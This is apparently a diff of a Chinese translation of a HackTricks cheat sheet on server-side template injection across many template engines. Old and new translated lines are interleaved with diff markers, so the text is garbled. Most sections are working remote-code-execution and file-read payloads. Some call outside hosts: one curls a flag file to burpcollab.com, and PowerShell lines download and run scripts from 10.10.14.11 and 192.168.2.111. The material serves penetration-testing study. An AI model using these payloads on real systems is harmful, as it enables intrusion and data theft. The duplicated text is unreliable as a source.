防止服务器端模板注入漏洞,开发人员应确保在将用户输入插入模板之前,正确地对其进行清理和验证。实施输入验证和使用上下文感知的转义技术可以帮助减轻此漏洞的风险。
### 检测
要检测服务器端模板注入SSTI最初**对模板进行模糊测试**是一种直接的方法。这涉及将一系列特殊字符(**`${{<%[%'"}}%\`**)注入到模板中,并分析服务器对常规数据与此特殊负载的响应之间的差异。漏洞指示包括:
要检测服务器端模板注入 (SSTI),最初,**模糊测试模板** 是一种简单的方法。这涉及将一系列特殊字符 (**`${{<%[%'"}}%\`**) 注入模板,并分析服务器对常规数据与此特殊有效载荷的响应差异。漏洞指示包括:
- 抛出错误,揭示漏洞并可能揭示模板引擎。
- 反射中负载的缺失,或部分缺失,暗示服务器对其进行不同于常规数据的处理
- **明文上下文**:通过检查服务器是否评估模板表达式(例如,`{{7*7}}``${7*7}`来区分XSS。
- **代码上下文**:通过更改输入参数来确认漏洞。例如,将`greeting`从`http://vulnerable-website.com/?greeting=data.username`更改为查看服务器输出是否动态或固定,例如`greeting=data.username}}hello`返回用户名。
* 抛出的错误,揭示漏洞并可能暴露模板引擎。
* 反射中缺少有效载荷,或部分缺失,暗示服务器以不同于常规数据的方式处理它
* **明文上下文**:通过检查服务器是否评估模板表达式(例如,`{{7*7}}``${7*7}`)来区分 XSS。
* **代码上下文**:通过更改输入参数确认漏洞。例如,改变 `http://vulnerable-website.com/?greeting=data.username` 中的 `greeting`,以查看服务器的输出是动态的还是固定的,例如 `greeting=data.username}}hello` 返回用户名。
#### 识别阶段
识别模板引擎涉及分析错误消息或手动测试各种特定语言的负载。导致错误的常见负载包括`${7/0}``{{7/0}}`和`<%= 7/0 %>`。观察服务器对数学运算的响应有助于确定特定的模板引擎。
识别模板引擎涉及分析错误消息或手动测试各种特定语言的有效载荷。常见的导致错误的有效载荷包括 `${7/0}``{{7/0}}` 和 `<%= 7/0 %>`。观察服务器对数学运算的响应有助于确定特定的模板引擎。
## 工具
### [TInjA](https://github.com/Hackmanit/TInjA)
款高效的SSTI + CSTI扫描器利用新颖的多语言混淆技术。
个高效的 SSTI + CSTI 扫描器,利用新颖的多语言组合
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
@ -74,13 +75,13 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
```
### [模板注入表](https://github.com/Hackmanit/template-injection-table)
一个交互式表格,包含最有效的模板注入多语言混合代码以及44个最重要的模板引擎的预期响应。
一个包含最有效的模板注入多语言的交互式表格以及44个最重要的模板引擎的预期响应。
## 攻击
## 漏洞
### 通用
在这个**单词列表**中,您可以找到下面提到的一些引擎环境中定义的**变量**
在这个**词汇表**中,您可以找到一些下面提到的引擎环境中**定义的变量**
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
* [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt)
@ -96,7 +97,7 @@ ${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
```
**Java - 检索系统的环境变量**
**Java - 获取系统的环境变量**
```java
${T(java.lang.System).getenv()}
```
@ -108,7 +109,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
```
### FreeMarker (Java)
您可以在 [https://try.freemarker.apache.org](https://try.freemarker.apache.org) 尝试您的有效
您可以在 [https://try.freemarker.apache.org](https://try.freemarker.apache.org) 尝试您的有效载
* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
@ -122,9 +123,9 @@ ${"freemarker.template.utility.Execute"?new()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
**Freemarker - 沙绕过**
**Freemarker - 沙绕过**
⚠️ 仅适用于版本低于2.3.30的Freemarker。
⚠️ 仅适用于 2.3.30 版本以下的 Freemarker
```java
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
@ -134,7 +135,7 @@ ${dwf.newInstance(ec,null)("id")}
```
**更多信息**
* 在[https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)的FreeMarker部分
* 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) FreeMarker 部分
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
### Velocity (Java)
@ -162,12 +163,12 @@ $out.read()
```
**更多信息**
* 在Velocity部分[https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Velocity 部分
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
### Thymeleaf
Thymeleaf中用于测试SSTI漏洞的常见表达式是`${7*7}`,这也适用于这个模板引擎。对于潜在的远程代码执行,可以使用以下表达式:
Thymeleaf 中,测试 SSTI 漏洞的常见表达式是 `${7*7}`,这同样适用于此模板引擎。对于潜在的远程代码执行,可以使用以下表达式:
* SpringEL:
@ -180,22 +181,22 @@ ${T(java.lang.Runtime).getRuntime().exec('calc')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
```
Thymeleaf要求这些表达式放置在特定属性中。然而对于其他模板位置支持_expression inlining_可以使用类似`[[...]]`或`[(...)]`的语法。因此一个简单的SSTI测试有效载荷可能看起来像`[[${7*7}]]`
Thymeleaf 要求这些表达式放置在特定属性中。然而,其他模板位置支持 _表达式内联_,使用语法如 `[[...]]``[(...)]`。因此,一个简单的 SSTI 测试有效载荷可能看起来像 `[[${7*7}]]`
然而,这个有效载荷能够成功的可能性通常很低。Thymeleaf的默认配置不支持动态模板生成模板必须预定义。开发人员需要实现自己的`TemplateResolver`来从字符串动态创建模板,这是不常见的
然而,这个有效载荷成功的可能性通常较低。Thymeleaf 的默认配置不支持动态模板生成;模板必须是预定义的。开发人员需要实现自己的 `TemplateResolver` 以动态创建字符串模板,这并不常见
Thymeleaf还提供_expression preprocessing_其中双下划线(`__...__`)内的表达式会被预处理。这个特性可以在表达式的构建中使用正如Thymeleaf文档中所示:
Thymeleaf 还提供 _表达式预处理_,其中双下划线 (`__...__`) 内的表达式会被预处理。这个特性可以在构建表达式时利用,如 Thymeleaf 文档中所示:
```java
#{selection.__${sel.code}__}
```
**Thymeleaf中的漏洞示例**
考虑以下代码片段,可能容易受到利用:
考虑以下代码片段,可能容易受到利用:
```xml
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
这表明,如果模板引擎未正确处理这些输入可能会导致远程代码执行访问类似以下的URL
这表明,如果模板引擎不正确地处理这些输入,可能会导致远程代码执行,访问类似以下的 URL
```
http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
@ -208,19 +209,19 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}
### Spring Framework (Java)
### Spring 框架 (Java)
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
**绕过过滤器**
如果`${...}`无效,可以尝试使用多个变量表达式,如`#{...}`, `*{...}`, `@{...}`或`~{...}`
可以使用多个变量表达式,如果 `${...}` 无法工作,请尝试 `#{...}`、`*{...}`、`@{...}` 或 `~{...}`
* 读取`/etc/passwd`
* 读取 `/etc/passwd`
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
* 用于生成 payload 的自定义脚本
* 自定义脚本用于有效载荷生成
```python
#!/usr/bin/python3
@ -253,7 +254,7 @@ print(base_payload + end_payload)
* [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)
### Spring视图操作Java
### Spring 视图操作 (Java)
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
@ -268,11 +269,11 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
* `{{ someString.toUPPERCASE() }}`
PebbleJava的旧版本< 版本3.0.9:
Pebble 的旧版本(< 版本 3.0.9
```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
新版本的Pebble
新版本的 Pebble :
```java
{% raw %}
{% set cmd = 'id' %}
@ -294,17 +295,15 @@ PebbleJava的旧版本< 版本3.0.9:
.newInstance(([bytes]).toArray()) }}
```
### Jinjava (Java)
### JinjavaJava
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
Jinjava 是一个由 Hubspot 开发的开源项目,地址为 [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
**Jinjava - 命令执行**
由Hubspot开发的开源项目[Jinjava](https://github.com/HubSpot/jinjava/)提供。
已通过[此处](https://github.com/HubSpot/jinjava/pull/230)修复。
通过 [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230) 修复
```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
@ -320,9 +319,9 @@ PebbleJava的旧版本< 版本3.0.9:
### Hubspot - HuBL (Java)
* `{% %}` 语句定界
* `{{ }}` 表达式定界
* `{# #}` 注释定界
* `{% %}` 语句分隔
* `{{ }}` 表达式分隔
* `{# #}` 注释分隔
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
@ -330,7 +329,7 @@ PebbleJava的旧版本< 版本3.0.9:
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
搜索"com.hubspot.content.hubl.context.TemplateContextRequest"并发现了[Github上的Jinjava项目](https://github.com/HubSpot/jinjava/)。
搜索 "com.hubspot.content.hubl.context.TemplateContextRequest" 并发现了 [Jinjava 项目在 Github 上](https://github.com/HubSpot/jinjava/)。
```java
{{request.isDebug()}}
//output: False
@ -383,13 +382,13 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`
表达式语言 (EL) 是 JavaEE 中的一个基本特性,有助于在表示层(如网页)和应用逻辑(如托管 bean之间进行交互。它在多个 JavaEE 技术中被广泛使用,以简化这种通信。利用 EL 的关键 JavaEE 技术包括:
表达式语言 (EL) 是一个基本特性,促进了 JavaEE 中表现层(如网页)与应用逻辑(如托管 bean之间的交互。它在多个 JavaEE 技术中被广泛使用,以简化这种通信。利用 EL 的关键 JavaEE 技术包括:
* **JavaServer Faces (JSF)**:使用 EL 将 JSF 页面中的组件绑定到相应的后端数据和操作。
* **JavaServer Pages (JSP)**EL 用于在 JSP 中访问和操作数据,使页面元素与应用数据连接更加容易。
* **Contexts and Dependency Injection for Java EE (CDI)**EL 与 CDI 集成,允许 Web 层与托管 bean 之间实现无缝交互,确保更一致的应用程序结构。
* **JavaServer Pages (JSP)**EL 在 JSP 中用于访问和操作 JSP 页面中的数据,使得连接页面元素与应用数据变得更容易。
* **Java EE 的上下文和依赖注入 (CDI)**EL 与 CDI 集成,允许 web 层与托管 bean 之间的无缝交互,确保更连贯的应用结构。
查看以下页面以了解有关 **EL 解释器利用** 的更多信息
查看以下页面以了解更多关于 **EL 解释器的利用**
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
@ -397,7 +396,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
### Groovy (Java)
以下安全管理器绕过方法取自这篇 [**文章**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/)。
以下安全管理器绕过来自于这篇 [**写作**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/)。
```java
//Basic Payload
import groovy.*;
@ -424,7 +423,7 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台
{% embed url="https://www.rootedcon.com/" %}
@ -440,7 +439,7 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
```
**更多信息**
* 在Smarty部分[https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Smarty 部分
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
### Twig (PHP)
@ -487,12 +486,12 @@ array("first_name" => $user.first_name)
```
**更多信息**
* 在[https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)的Twig和Twig沙盒部分
* 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Twig 和 Twig (Sandboxed) 部分
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
### PlatesPHP
### Plates (PHP)
Plates是PHP原生的模板引擎灵感来自Twig。然而与引入新语法的Twig不同Plates利用模板中的原生PHP代码使其对PHP开发人员直观易懂。
Plates 是一个原生于 PHP 的模板引擎,受到 Twig 的启发。然而,与引入新语法的 Twig 不同Plates 在模板中利用原生 PHP 代码,使其对 PHP 开发者直观易懂。
控制器:
```php
@ -526,7 +525,7 @@ echo $templates->render('profile', ['name' => 'Jonathan']);
### PHPlib 和 HTML\_Template\_PHPLIB (PHP)
[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) 与 PHPlib 相同,但移植到 Pear。
[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) 与 PHPlib 相同,但移植到 Pear。
`authors.tpl`
```html
@ -599,12 +598,12 @@ echo $t->finish($t->parse('OUT', 'authors'));
```
**更多信息**
* 在[Jade](https://portswigger.net/research/server-side-template-injection)部分
* 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Jade 部分
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
### patTemplate (PHP)
> [patTemplate](https://github.com/wernerwa/pat-template)是一个非编译的 PHP 模板引擎,使用 XML 标记将文档分成不同部分。
> [patTemplate](https://github.com/wernerwa/pat-template) 是一个不编译的 PHP 模板引擎,使用 XML 标签将文档分成不同部分
```xml
<patTemplate:tmpl name="page">
This is the main page.
@ -622,13 +621,13 @@ Hello {NAME}.<br/>
### Handlebars (NodeJS)
路径遍历(更多信息请参见[此处](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/))。
路径遍历(更多信息 [这里](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/))。
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
* \= 错误
* ${7\*7} = ${7\*7}
* 无
* 无内容
```java
{{#with "s" as |string|}}
{{#with "e"}}
@ -659,12 +658,12 @@ URLencoded:
### JsRender (NodeJS)
| **模板** | **描述** |
| ------------ | --------------------------------------- |
| | 评估和呈现输出 |
| | 评估和呈现HTML编码的输出 |
| | 注释 |
| 和 | 允许代码(默认情况下禁用) |
| **模板** | **描述** |
| -------- | ------------------------------------- |
| | 评估并渲染输出 |
| | 评估并渲染HTML编码输出 |
| | 注释 |
| 和 | 允许代码(默认禁用) |
* \= 49
@ -714,7 +713,7 @@ home = pugjs.render(injected_page)
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
* `<%= foobar %> = 错误`
```python
<%= system("whoami") %> #Execute code
<%= Dir.entries('/') %> #List folder
@ -742,7 +741,7 @@ home = pugjs.render(injected_page)
### Python
查看以下页面了解有关在Python中**绕过沙盒执行任意命令**的技巧:
查看以下页面以了解有关 **绕过沙箱的任意命令执行** 的技巧:
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
@ -777,9 +776,9 @@ home = pugjs.render(injected_page)
[官方网站](http://jinja.pocoo.org)
> Jinja2是Python的一个功能齐全的模板引擎。它具有完整的Unicode支持可选的集成沙盒执行环境被广泛使用并且采用BSD许可证
> Jinja2 是一个功能齐全的 Python 模板引擎。它具有完整的 Unicode 支持、可选的集成沙箱执行环境,广泛使用并且是 BSD 许可的
* `{{7*7}} = Error`
* `{{7*7}} = 错误`
* `${7*7} = ${7*7}`
* `{{foobar}} 无`
* `{{4*4}}[[5*5]]`
@ -817,7 +816,7 @@ home = pugjs.render(injected_page)
```
[**不依赖**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__` 的 RCE
[**RCE 不依赖**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
@ -828,13 +827,13 @@ home = pugjs.render(injected_page)
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
```
**关于如何滥用Jinja的更多细节**
**关于如何滥用 Jinja 的更多细节**
{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md](jinja2-ssti.md)
{% endcontent-ref %}
其他有效载荷请参考[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
其他有效载荷在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
### Mako (Python)
```python
@ -857,11 +856,11 @@ ${x}
* `@{} <= 错误!`
* `@{ <= 错误!`
* `@(1+2)`
* `@( //C#Code )`
* `@( //C#代码 )`
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBCAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
.NET的`System.Diagnostics.Process.Start`方法可用于在服务器上启动任何进程从而创建Webshell。您可以在[https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)找到一个易受攻击的Web应用示例。
.NET `System.Diagnostics.Process.Start` 方法可用于在服务器上启动任何进程,从而创建 webshell。您可以在 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp) 找到一个易受攻击的 webapp 示例。
**更多信息**
@ -873,7 +872,7 @@ ${x}
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = 无
* `<%= response.write(date()) %>` = \<Date>
* `<%= response.write(date()) %>` = \<日期>
```xml
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
@ -883,7 +882,7 @@ ${x}
### Mojolicious (Perl)
即使是 Perl它也使用类似 Ruby 中的 ERB 标记
即使是perl它也使用像Ruby中的ERB这样的标签
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
@ -891,25 +890,25 @@ ${x}
<%= perl code %>
<% perl code %>
```
### GO 中的 SSTI
### SSTI in GO
在 Go 的模板引擎中,可以通过特定的有效载荷确认其使用方式
在 Go 的模板引擎中,可以通过特定的有效载荷确认其使用:
- `{{ . }}`:显示数据结构输入。例如,如果传递了一个带有 `Password` 属性的对象,则 `{{ .Password }}` 可能会暴露它。
- `{{printf "%s" "ssti" }}`:预期显示字符串 "ssti"。
- `{{html "ssti"}}``{{js "ssti"}}`:这些有效载荷应返回 "ssti",而不附加 "html" 或 "js"。更多指令可以在 Go 文档中探索 [这里](https://golang.org/pkg/text/template)。
* `{{ . }}`:揭示数据结构输入。例如,如果传递了一个具有 `Password` 属性的对象,`{{ .Password }}` 可能会暴露它。
* `{{printf "%s" "ssti" }}`:预计显示字符串 "ssti"。
* `{{html "ssti"}}``{{js "ssti"}}`:这些有效载荷应返回 "ssti",而不附加 "html" 或 "js"。可以在 Go 文档中进一步探索指令 [here](https://golang.org/pkg/text/template)。
**XSS 利用**
**XSS Exploitation**
使用 `text/template` 包,可以通过直接插入有效载荷来简单地进行 XSS。相反`html/template` 包对响应进行编码以防止此问题(例如,`{{"<script>alert(1)</script>"}}` 的结果是 `&lt;script&gt;alert(1)&lt;/script&gt;`)。然而,在 Go 中,模板定义和调用可以绕过编码:\{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
使用 `text/template` 包,XSS 可以通过直接插入有效载荷来实现。相反,`html/template` 包对响应进行编码以防止这种情况(例如,`{{"<script>alert(1)</script>"}}` 结果为 `&lt;script&gt;alert(1)&lt;/script&gt;`)。然而,在 Go 中,模板定义和调用可以绕过这种编码:\{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
vbnet 复制代码
vbnet Copy code
**RCE 利用**
**RCE Exploitation**
`html/template``text/template` 之间的 RCE 利用方式有很大不同。`text/template` 模块允许直接调用任何公共函数使用“call”值而在 `html/template` 中不允许这样做。这些模块的文档可以在 [这里查看 html/template](https://golang.org/pkg/html/template/) 和 [这里查看 text/template](https://golang.org/pkg/text/template/)。
RCE 利用在 `html/template``text/template` 之间有显著差异。`text/template` 模块允许直接调用任何公共函数使用“call”值而在 `html/template` 中不允许。有关这些模块的文档可在 [here for html/template](https://golang.org/pkg/html/template/) 和 [here for text/template](https://golang.org/pkg/text/template/) 中找到
对于 Go 中的 SSTI可以调用对象方法来进行 RCE 利用。例如,如果提供的对象具有执行命令的 `System` 方法,则可以像这样利用它:`{{ .System "ls" }}`。通常需要访问源代码才能利用这一点,就像给定的示例中所示:
通过 Go 中的 SSTI 进行 RCE可以调用对象方法。例如如果提供的对象具有执行命令的 `System` 方法,可以像 `{{ .System "ls" }}` 一样利用它。通常需要访问源代码才能进行利用,如给定的示例所示:
```go
func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
@ -921,9 +920,9 @@ return string(out)
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
### 更多利用
### 更多漏洞
查看 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) 获取更多利用。您还可以在 [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) 找到有趣的标签信息。
查看 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) 以获取更多漏洞。您还可以在 [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) 找到有趣的标签信息。
## BlackHat PDF
@ -931,10 +930,10 @@ return string(out)
## 相关帮助
如果您认为有用,请阅读:
如果您认为这可能有用,请阅读:
* [Flask技巧](../../network-services-pentesting/pentesting-web/flask.md)
* [Python魔术函数](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md)
* [Flask 技巧](../../network-services-pentesting/pentesting-web/flask.md)
* [Python 魔法函数](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md)
## 工具
@ -943,11 +942,11 @@ return string(out)
* [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
* [https://github.com/Hackmanit/template-injection-table](https://github.com/Hackmanit/template-injection-table)
## 暴力检测列表
## 暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## 练习和参考
## 实践与参考
* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
@ -955,20 +954,21 @@ return string(out)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点会议
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科的技术和网络安全专业人士的热烈交流平台
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
